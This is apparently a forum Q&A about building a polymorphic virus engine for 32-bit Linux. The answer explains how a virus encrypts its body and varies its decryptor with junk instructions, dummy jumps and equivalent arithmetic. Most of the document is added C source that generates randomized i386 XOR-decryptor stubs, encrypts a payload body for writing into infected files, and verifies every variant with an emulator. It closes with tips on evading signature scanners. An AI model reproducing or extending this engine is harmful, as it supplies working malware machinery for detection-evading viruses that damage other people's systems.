I have to program a simple polymorphic engine. I use Linux (32-bit) and I can code in assembly and C. I don't know how to start.
Can you give me a schema for constructing such an engine? My idea is to make a program that:
Is that right? Does it reflect the operation of such an engine?
The basic schema is quite different from the one you've described. Usually only the virus body is encrypted, and not the whole code section. Consider a simple virus that either extends the code section or creates a new one for its body. Now, to make it polymorphic, you have to add encryption and make the decryptor code non-constant, e.g.:
1) insert nops randomly:
   nop
   add reg, 0
   push reg; pop reg
   etc.
2) change the program flow with:
   jmp next
   clc; jc next
   etc.
3) use instructions with the same arithmetic effect:
   add eax, 3 -> add eax, 9; sub eax, 6
Polymorphic means that it could have a fixed number of encodings, so the simplest way to create one is to break the decryptor code into several blocks, and provide several encodings with the same length for each.
EDIT: Yes, it's a part of the virus body. In order to use it you put all these "bricks" in the virus body, and when another file is infected, you create a random version of the decryptor for it.
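To make the "bricks" idea concrete, here is an added example that is my code, not the answerer's: a generator that assembles a 32-bit x86 XOR-decryptor stub from fixed-length slots, each slot having several interchangeable encodings drawn from the three tricks above (junk instructions, flow changes that go nowhere, arithmetic rewrites of the same effect), plus a tiny interpreter that runs the generated bytes over an encrypted body to prove every combination decrypts correctly. The assumptions are mine: the stub sits directly in front of the encrypted body (so `call`/`pop` yields its own address), the body is at least one byte, eax/ecx/esi are free to clobber, and the function names (`build_decryptor`, `build_infection`, `run_decryptor`, `self_check`, `distinct_variants`) are hypothetical. Patching a host file's entry point to reach the stub is not shown.

```c
/* Added example (not the post's code): build a random i386 XOR-decryptor stub from
 * interchangeable same-length "bricks", then verify it with a tiny interpreter.
 * 32-bit encodings only: in 64-bit mode 0x46/0x49 are REX prefixes, not inc/dec. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fixed slot layout, so the total length and the loop's jump offset never change:
 *  0: E8 00 00 00 00 call next   5: 5E next: pop esi   6: [3] esi += 28   9: [6] ecx = n
 * 15: [4] al = key   19: loop: [3] xor [esi],al   22: [3] junk   25: [3] esi++
 * 28: [5] ecx--; jnz loop (rel8 = -14 = 0xF2)   33: encrypted body follows */
#define DECRYPTOR_LEN 33u

typedef struct { uint32_t s; } rng_t;                  /* xorshift32: a seed reproduces one variant */
static int pick(rng_t *r, int n) { r->s ^= r->s << 13; r->s ^= r->s >> 17; r->s ^= r->s << 5; return (int)(r->s % (uint32_t)n); }
static size_t put(uint8_t *p, const uint8_t *s, size_t n) { memcpy(p, s, n); return n; }

/* Slots whose bytes do not depend on key or length (tricks 1 and 2 live in JUNK_T). */
static const uint8_t XOR_T[2][3]  = {{0x30,0x06,0x90}, {0x30,0x46,0x00}};   /* xor [esi],al;nop / xor [esi+0],al */
static const uint8_t JUNK_T[5][3] = {{0x90,0x90,0x90}, {0x83,0xC0,0x00}, {0x50,0x58,0x90}, {0xEB,0x00,0x90}, {0xF8,0x72,0x00}};
/* JUNK_T: nops / add eax,0 / push eax;pop eax;nop / jmp next;nop / clc;jc next. None touches esi, ecx or al. */
static const uint8_t INC_T[3][3]  = {{0x46,0x90,0x90}, {0x83,0xC6,0x01}, {0x8D,0x76,0x01}}; /* inc esi / add esi,1 / lea esi,[esi+1] */
static const uint8_t END_T[2][5]  = {{0x49,0x90,0x90,0x75,0xF2}, {0x83,0xE9,0x01,0x75,0xF2}}; /* dec ecx / sub ecx,1 ; jnz -14 */

static size_t emit_add_esi(uint8_t *p, int v, uint8_t d) {   /* trick 3: add esi,d / lea esi,[esi+d] / sub esi,-d */
    const uint8_t e[3][3] = {{0x83,0xC6,d}, {0x8D,0x76,d}, {0x83,0xEE,(uint8_t)-d}};
    return put(p, e[v], 3);
}
static size_t emit_count(uint8_t *p, int v, uint32_t n) {    /* mov ecx,n;nop / push n;pop ecx / xor ecx,ecx;mov cx,n */
    uint8_t b0 = (uint8_t)n, b1 = (uint8_t)(n >> 8), b2 = (uint8_t)(n >> 16), b3 = (uint8_t)(n >> 24);
    const uint8_t e[3][6] = {{0xB9,b0,b1,b2,b3,0x90}, {0x68,b0,b1,b2,b3,0x59}, {0x31,0xC9,0x66,0xB9,b0,b1}};
    return put(p, e[v == 2 && n > 0xFFFF ? 0 : v], 6);      /* the 16-bit form only fits small n */
}
static size_t emit_key(uint8_t *p, int v, uint8_t key, uint8_t m) { /* al = key, hidden behind a random mask m */
    const uint8_t e[4][4] = {{0xB0,key,0x90,0x90}, {0xB0,(uint8_t)(key-m),0x04,m},        /* mov;nops / mov;add */
                             {0xB0,(uint8_t)(key+m),0x2C,m}, {0xB0,(uint8_t)(key^m),0x34,m}}; /* mov;sub / mov;xor */
    return put(p, e[v], 4);
}

/* One random decryptor for a body of n (>= 1) bytes xored with key; always DECRYPTOR_LEN bytes long. */
size_t build_decryptor(uint8_t *out, uint32_t n, uint8_t key, uint32_t seed) {
    static const uint8_t prologue[6] = {0xE8,0,0,0,0, 0x5E};  /* call next ; next: pop esi */
    rng_t r = { seed ? seed : 1 };
    uint8_t *p = out + put(out, prologue, 6);
    p += emit_add_esi(p, pick(&r, 3), (uint8_t)(DECRYPTOR_LEN - 5)); /* next sits at 5, body at 33 */
    p += emit_count(p, pick(&r, 3), n);
    int kv = pick(&r, 4), m = pick(&r, 256);
    p += emit_key(p, kv, key, (uint8_t)m);
    p += put(p, XOR_T[pick(&r, 2)], 3);
    p += put(p, JUNK_T[pick(&r, 5)], 3);
    p += put(p, INC_T[pick(&r, 3)], 3);
    p += put(p, END_T[pick(&r, 2)], 5);
    return (size_t)(p - out);
}
/* Stub followed by the encrypted body: the unit that would be written into an infected file. */
size_t build_infection(uint8_t *out, const uint8_t *body, uint32_t n, uint8_t key, uint32_t seed) {
    size_t len = build_decryptor(out, n, key, seed);
    for (uint32_t i = 0; i < n; i++) out[len + i] = body[i] ^ key;
    return len + n;
}

static uint32_t rd32(const uint8_t *p) { return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
/* Interprets only the opcodes the generator emits (offsets into img act as addresses);
 * returns 1 when the stub falls through to the body with its loop finished. */
int run_decryptor(uint8_t *img, uint32_t n) {
    uint32_t eax = 0, ecx = 0, esi = 0, stk[4], sp = 0, pc = 0, budget = 64 + 16 * n;
    int zf = 0, cf = 1;                                    /* cf is modelled for clc/jc only */
    while (pc < DECRYPTOR_LEN && budget--) {
        uint8_t *c = img + pc, mr = c[1]; int8_t ib = (int8_t)c[2];
        switch (c[0]) {
        case 0xE8: stk[sp++] = pc + 5; pc += 5 + rd32(c + 1); break;            /* call rel32 */
        case 0x5E: esi = stk[--sp]; pc += 1; break;                              /* pop esi */
        case 0x83: { uint32_t *r = (mr & 7) == 6 ? &esi : (mr & 7) == 1 ? &ecx : &eax;
                     if (((mr >> 3) & 7) == 0) *r += ib; else *r -= ib;          /* /0 add, /5 sub imm8 */
                     zf = (*r == 0); pc += 3; break; }
        case 0x8D: esi += ib; pc += 3; break;                                     /* lea esi,[esi+d8] */
        case 0xB9: ecx = rd32(c + 1); pc += 5; break;                             /* mov ecx,imm32 */
        case 0x68: stk[sp++] = rd32(c + 1); pc += 5; break;                       /* push imm32 */
        case 0x59: ecx = stk[--sp]; pc += 1; break;                               /* pop ecx */
        case 0x31: ecx = 0; zf = 1; pc += 2; break;                               /* xor ecx,ecx */
        case 0x66: ecx = (ecx & 0xFFFF0000u) | c[2] | (uint32_t)c[3] << 8; pc += 4; break; /* mov cx,imm16 */
        case 0xB0: eax = (eax & ~0xFFu) | c[1]; pc += 2; break;                   /* mov al,imm8 */
        case 0x04: eax = (eax & ~0xFFu) | ((eax + c[1]) & 0xFF); pc += 2; break;  /* add al,imm8 */
        case 0x2C: eax = (eax & ~0xFFu) | ((eax - c[1]) & 0xFF); pc += 2; break;  /* sub al,imm8 */
        case 0x34: eax ^= c[1]; pc += 2; break;                                   /* xor al,imm8 */
        case 0x30: img[esi + (mr == 0x46 ? ib : 0)] ^= (uint8_t)eax; pc += mr == 0x46 ? 3 : 2; break;
        case 0x90: pc += 1; break;    case 0xF8: cf = 0; pc += 1; break;          /* nop ; clc */
        case 0x50: stk[sp++] = eax; pc += 1; break;    case 0x58: eax = stk[--sp]; pc += 1; break;
        case 0xEB: pc += 2 + (int8_t)c[1]; break;                                 /* jmp rel8 */
        case 0x72: pc += 2 + (cf ? (int8_t)c[1] : 0); break;                      /* jc rel8 */
        case 0x46: esi += 1; zf = (esi == 0); pc += 1; break;                     /* inc esi */
        case 0x49: ecx -= 1; zf = (ecx == 0); pc += 1; break;                     /* dec ecx */
        case 0x75: pc += 2 + (zf ? 0 : (int8_t)c[1]); break;                      /* jnz loop */
        default: return 0;                                                        /* not an emitted opcode */
        }
    }
    return pc == DECRYPTOR_LEN;
}

/* Round trip for seeds 1..k over a constructed body; returns how many seeds decrypt it correctly. */
int self_check(int k) {
    static const uint8_t body[] = "constructed sample body, not real code";
    uint32_t n = sizeof body - 1; int ok = 0;
    for (int s = 1; s <= k; s++) {
        uint8_t img[DECRYPTOR_LEN + sizeof body];
        size_t total = build_infection(img, body, n, 0x5A, (uint32_t)s);
        if (total == DECRYPTOR_LEN + n && memcmp(img + DECRYPTOR_LEN, body, n) != 0   /* really encrypted */
            && run_decryptor(img, n) && memcmp(img + DECRYPTOR_LEN, body, n) == 0) ok++;
    }
    return ok;
}
/* How many of seeds 2..k produce a stub whose bytes differ from seed 1's (all are DECRYPTOR_LEN long). */
int distinct_variants(int k) {
    uint8_t a[DECRYPTOR_LEN], b[DECRYPTOR_LEN]; int d = 0;
    build_decryptor(a, 40, 0x5A, 1);
    for (int s = 2; s <= k; s++) { build_decryptor(b, 40, 0x5A, (uint32_t)s); d += memcmp(a, b, DECRYPTOR_LEN) != 0; }
    return d;
}

int main(void) {                                           /* dumps one image for objdump -D -b binary -m i386 -M intel */
    static const uint8_t body[] = "constructed sample body, not real code"; uint8_t img[DECRYPTOR_LEN + sizeof body];
    FILE *f = fopen("decryptor.bin", "wb"); size_t n = build_infection(img, body, sizeof body - 1, 0x5A, 7);
    if (f) { fwrite(img, 1, n, f); fclose(f); }
    return printf("%zu bytes written; %d/64 seeds round-trip\n", n, self_check(64)) < 0;
}
```

Build with `gcc -std=c99 -Wall` and run it; then `objdump -D -b binary -m i386 -M intel decryptor.bin` shows the 33-byte stub that a different seed would render with different bytes but the same slot boundaries. Two caveats a practitioner would want: the junk slot sits between the `xor` and the `dec ecx` precisely because `add eax,0` and `clc` clobber flags, so no flag-dependent instruction may follow a junk slot before something rewrites the flags; and because every slot has a fixed length and the `call next / pop esi` prologue is constant, the stub still has a stable shape (`E8 00 00 00 00 5E` at a fixed distance from the encrypted body), which is itself a signature. Real engines therefore also vary slot lengths, register assignment and instruction order, and scanners answer with exactly the kind of interpreter shown in `run_decryptor`: emulate the stub and inspect what it decrypts.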